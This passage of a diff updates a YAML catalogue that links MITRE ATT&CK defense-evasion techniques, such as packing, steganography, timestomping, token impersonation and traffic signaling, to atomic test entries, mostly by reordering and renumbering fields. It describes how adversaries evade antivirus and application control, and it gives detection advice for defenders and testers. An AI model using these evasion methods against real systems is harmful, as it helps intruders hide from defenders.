x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
parameters for scripts like PubPrn.vbs that may be used to proxy execution
of malicious files.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Application control
+ - Digital Certificate Validation
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
identifier: T1216
atomic_tests:
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
@@ -31038,23 +31981,6 @@ defense-evasion:
name: command_prompt
T1027.002:
technique:
- id: attack-pattern--deb98323-e13f-4b0c-8d94-175379069062
- description: "Adversaries may perform software packing or virtual machine software
- protection to conceal their code. Software packing is a method of compressing
- or encrypting an executable. Packing an executable changes the file signature
- in an attempt to avoid signature-based detection. Most decompression techniques
- decompress the executable code in memory. Virtual machine software protection
- translates an executable's original code into a special format that only a
- special virtual machine can run. A virtual machine is then called to run this
- code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software
- packing are called packers. Example packers are MPRESS and UPX. A more comprehensive
- list of known packers is available, (Citation: Wikipedia Exe Compression)
- but adversaries may create their own packing techniques that do not leave
- the same artifacts as well-known packers to evade defenses. "
- name: Software Packing
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1027.002
@@ -31069,6 +31995,23 @@ defense-evasion:
- url: http://en.wikipedia.org/wiki/Executable_compression
description: Executable compression. (n.d.). Retrieved December 4, 2014.
source_name: Wikipedia Exe Compression
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Software Packing
+ description: "Adversaries may perform software packing or virtual machine software
+ protection to conceal their code. Software packing is a method of compressing
+ or encrypting an executable. Packing an executable changes the file signature
+ in an attempt to avoid signature-based detection. Most decompression techniques
+ decompress the executable code in memory. Virtual machine software protection
+ translates an executable's original code into a special format that only a
+ special virtual machine can run. A virtual machine is then called to run this
+ code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software
+ packing are called packers. Example packers are MPRESS and UPX. A more comprehensive
+ list of known packers is available, (Citation: Wikipedia Exe Compression)
+ but adversaries may create their own packing techniques that do not leave
+ the same artifacts as well-known packers to evade defenses. "
+ id: attack-pattern--deb98323-e13f-4b0c-8d94-175379069062
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31208,23 +32151,23 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T20:26:01.690Z'
created: '2020-02-10T20:47:10.082Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_contributors:
+ - Erye Hernandez, Palo Alto Networks
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
x_mitre_detection: It's not common for spaces to be at the end of filenames,
so this is something that can easily be checked with file monitoring. From
the user's perspective though, this is very hard to notice from within the
Finder.app or on the command-line in Terminal.app. Processes executed from
binaries containing non-standard extensions in the filename are suspicious.
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Erye Hernandez, Palo Alto Networks
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1036.006
atomic_tests:
- name: Space After Filename
@@ -31259,14 +32202,13 @@ defense-evasion:
description: "Adversaries may use steganography techniques in order to prevent
the detection of hidden information. Steganographic techniques can be used
to hide data in digital media such as images, audio tracks, video clips, or
- text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was one of
- the first known and reported adversaries that used steganography with Invoke-PSImage.
- It encrypted the gathered information from a victim's system and hid it within
- an image before exfiltrating the image to a C2 server.(Citation: Wikipedia
- Duqu) \n\nBy the end of 2017, a threat group used Invoke-PSImage to
- hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands
- in an image file (.png) and execute the code on a victim's system. In this
- particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001)
+ text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early
+ example of malware that used steganography. It encrypted the gathered information
+ from a victim's system and hid it within an image before exfiltrating the
+ image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a
+ threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001)
+ commands in an image file (.png) and execute the code on a victim's system.
+ In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001)
code downloaded another obfuscated script to gather intelligence from the
victim's machine and communicate it back to the adversary.(Citation: McAfee
Malicious Doc Targets Pyeongchang Olympics) "
@@ -31275,20 +32217,20 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T20:56:07.825Z'
+ modified: '2020-06-08T18:16:48.253Z'
created: '2020-02-05T14:28:16.719Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Binary file metadata
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Detection of steganography is difficult unless artifacts
are left behind by the obfuscation process that are detectable with a known
signature. Look for strings are other signatures left in system artifacts
related to decoding steganography.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Binary file metadata
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1553:
technique:
@@ -31338,18 +32280,23 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-31T12:49:36.781Z'
+ modified: '2020-06-20T22:42:26.314Z'
created: '2020-02-05T14:54:07.588Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Anti-virus
- - Autoruns Analysis
- - Digital Certificate Validation
- - Process whitelisting
- - User Mode Signature Validation
- - Windows User Account Control
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_data_sources:
+ - Binary file metadata
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - API monitoring
+ - Application logs
+ - DLL monitoring
+ - Loaded DLLs
+ - Windows Registry
+ - Windows event logs
x_mitre_detection: "Collect and analyze signing certificate metadata on software
that executes within the environment to look for unusual certificate characteristics
and outliers. Periodically baseline registered SIPs and trust providers (Registry
@@ -31367,21 +32314,16 @@ defense-evasion:
high false positive alerts, so compare against baseline knowledge for how
systems are typically used and correlate modification events with other indications
of malicious activity where possible. "
- x_mitre_data_sources:
- - Binary file metadata
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - API monitoring
- - Application logs
- - DLL monitoring
- - Loaded DLLs
- - Windows Registry
- - Windows event logs
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ - Autoruns Analysis
+ - Digital Certificate Validation
+ - Process whitelisting
+ - User Mode Signature Validation
+ - Windows User Account Control
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
atomic_tests: []
T1548.003:
technique:
@@ -31423,23 +32365,23 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-27T01:03:26.306Z'
created: '2020-01-30T14:34:44.992Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: On Linux, auditd can alert every time a user's actual ID
and effective ID are different (this is what happens when you sudo). This
technique is abusing normal functionality in macOS and Linux systems, but
sudo has the ability to log all input and output based on the LOG_INPUT
and LOG_OUTPUT directives in the /etc/sudoers file.
- x_mitre_permissions_required:
- - User
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -31487,23 +32429,7 @@ defense-evasion:
sudo visudo -c -f /etc/sudoers
T1497.001:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1497.001
- url: https://attack.mitre.org/techniques/T1497/001
- - source_name: McAfee Virtual Jan 2017
- url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual
- Machine. Retrieved April 17, 2019.
- - url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/
- description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle
- Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September
- 24, 2018.
- source_name: Unit 42 OilRig Sept 2018
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: System Checks
+ id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
based on the results of checks for the presence of artifacts indicative of
@@ -31533,12 +32459,30 @@ defense-evasion:
temperature, and audio devices, could also be used to gather evidence that
can be indicative a virtual environment. Adversaries may also query for specific
readings from these devices.(Citation: Unit 42 OilRig Sept 2018)"
- id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6
+ name: System Checks
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.001
+ url: https://attack.mitre.org/techniques/T1497/001
+ - source_name: McAfee Virtual Jan 2017
+ url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
+ description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual
+ Machine. Retrieved April 17, 2019.
+ - url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/
+ description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle
+ Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September
+ 24, 2018.
+ source_name: Unit 42 OilRig Sept 2018
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T14:20:15.370Z'
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.514Z'
created: '2020-03-06T20:57:37.959Z'
x_mitre_platforms:
- Linux
@@ -31621,30 +32565,31 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-23T23:50:48.027Z'
+ modified: '2020-05-19T21:22:37.865Z'
created: '2019-12-19T19:43:34.507Z'
- x_mitre_defense_bypassed:
- - Host intrusion prevention systems
- - Anti-virus
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_detection: |-
- System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
-
- Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Jean-Ian Boutin, ESET
+ - McAfee
+ - Ryan Becwar
x_mitre_data_sources:
- EFI
- BIOS
- API monitoring
- x_mitre_contributors:
- - McAfee
- - Ryan Becwar
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
+
+ Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Host intrusion prevention systems
+ - Anti-virus
+ - File monitoring
atomic_tests: []
T1221:
technique:
@@ -31699,27 +32644,28 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T23:32:53.432Z'
+ modified: '2020-04-29T14:37:59.462Z'
created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- x_mitre_contributors:
- - Patrick Campbell, @pjcampbe11
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Analyze process behavior to determine if an Office application
+ is performing actions, such as opening network connections, reading files,
+ spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)),
+ or other suspicious actions that could relate to post-compromise behavior.'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
x_mitre_data_sources:
- Anti-virus
- Email gateway
- Network intrusion detection system
- Web logs
- x_mitre_defense_bypassed:
- - Static File Analysis
- x_mitre_detection: 'Analyze process behavior to determine if an Office application
- is performing actions, such as opening network connections, reading files,
- spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)),
- or other suspicious actions that could relate to post-compromise behavior.'
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Brian Wiltse @evalstrings
+ - Patrick Campbell, @pjcampbe11
+ x_mitre_version: '1.2'
atomic_tests: []
T1055.003:
technique:
@@ -31760,12 +32706,16 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:40:58.149Z'
+ modified: '2020-06-20T22:21:29.233Z'
created: '2020-01-14T01:28:32.166Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -31778,14 +32728,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.005:
technique:
@@ -31829,12 +32775,14 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:41:25.118Z'
+ modified: '2020-06-20T22:23:30.093Z'
created: '2020-01-14T01:30:41.092Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -31847,12 +32795,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1497.003:
technique:
@@ -31879,17 +32825,17 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T14:14:03.875Z'
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.532Z'
created: '2020-03-06T21:11:11.225Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Deloitte Threat Library Team
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -31899,39 +32845,41 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
- - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
- T1551.006:
+ T1070.006:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1551.006
- url: https://attack.mitre.org/techniques/T1551/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Timestomp
+ created: '2020-01-31T12:42:44.103Z'
+ modified: '2020-03-29T21:39:46.724Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
description: |-
Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T21:39:46.724Z'
- created: '2020-01-31T12:42:44.103Z'
+ name: Timestomp
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1070.006
+ url: https://attack.mitre.org/techniques/T1070/006
+ - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ source_name: WindowsIR Anti-Forensic Techniques
x_mitre_platforms:
- Linux
- macOS
@@ -31954,7 +32902,7 @@ defense-evasion:
x_mitre_version: '1.0'
x_mitre_contributors:
- Romain Dumont, ESET
- identifier: T1551.006
+ identifier: T1070.006
atomic_tests:
- name: Set a file's access timestamp
auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
@@ -32170,6 +33118,23 @@ defense-evasion:
name: powershell
T1134.001:
technique:
+ created: '2020-02-18T16:39:06.289Z'
+ modified: '2020-03-26T21:29:18.608Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
+ description: |-
+ Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
+
+ An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
+ name: Token Impersonation/Theft
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1134.001
@@ -32178,23 +33143,6 @@ defense-evasion:
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
source_name: Microsoft Command-line Logging
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Token Impersonation/Theft
- description: |-
- Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
-
- An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
- id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-26T21:29:18.608Z'
- created: '2020-02-18T16:39:06.289Z'
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -32213,27 +33161,28 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
atomic_tests: []
- T1545:
+ T1205:
technique:
+ revoked: false
+ id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Traffic Signaling
+ description: |-
+ Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
+
+ Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
+
+ The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
external_references:
- source_name: mitre-attack
- external_id: T1545
- url: https://attack.mitre.org/techniques/T1545
+ external_id: T1205
+ url: https://attack.mitre.org/techniques/T1205
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Traffic Signaling
- description: |-
- Adversaries may use traffic signaling to hide open ports used for persistence or command and control. Traffic signaling is a well-established method used by both defenders and adversaries to hide open ports from access/discovery. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1545/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
-
- This technique has been observed for both the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
-
- The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -32242,24 +33191,26 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T20:14:07.431Z'
- created: '2020-01-22T20:18:16.952Z'
+ modified: '2020-07-01T18:27:41.755Z'
+ created: '2018-04-18T17:59:24.739Z'
+ x_mitre_contributors:
+ - Josh Day, Gigamon
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- Linux
- macOS
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Packet capture
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_permissions_required:
- - User
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Josh Day, Gigamon
atomic_tests: []
T1127:
technique:
@@ -32292,7 +33243,7 @@ defense-evasion:
WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
- whitelisting defensive solutions.'
+ control solutions.'
name: Trusted Developer Utilities Proxy Execution
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
id: attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b
@@ -32300,26 +33251,26 @@ defense-evasion:
kill_chain_phases:
- phase_name: defense-evasion
kill_chain_name: mitre-attack
- modified: '2020-03-29T19:56:43.361Z'
+ modified: '2020-06-20T22:43:41.298Z'
created: '2017-05-31T21:31:39.262Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
+ x_mitre_version: '1.2'
+ x_mitre_contributors:
+ - Casey Smith
+ - Matthew Demaske, Adaptforward
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Application control
x_mitre_detection: |-
Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.
- x_mitre_defense_bypassed:
- - Application whitelisting
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Casey Smith
- - Matthew Demaske, Adaptforward
- x_mitre_version: '1.2'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1535:
technique:
@@ -32352,25 +33303,26 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2019-10-22T19:56:22.024Z'
+ modified: '2020-07-14T19:17:44.563Z'
created: '2019-09-04T14:35:04.617Z'
- x_mitre_detection: 'Monitor system logs to review activities occurring across
- all cloud environments and regions. Configure alerting to notify of activity
- in normally unused regions or if the number of instances active in a region
- goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)'
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Netskope
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- AWS
- GCP
- Azure
+ x_mitre_contributors:
+ - Netskope
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Monitor system logs to review activities occurring across
+ all cloud environments and regions. Configure alerting to notify of activity
+ in normally unused regions or if the number of instances active in a region
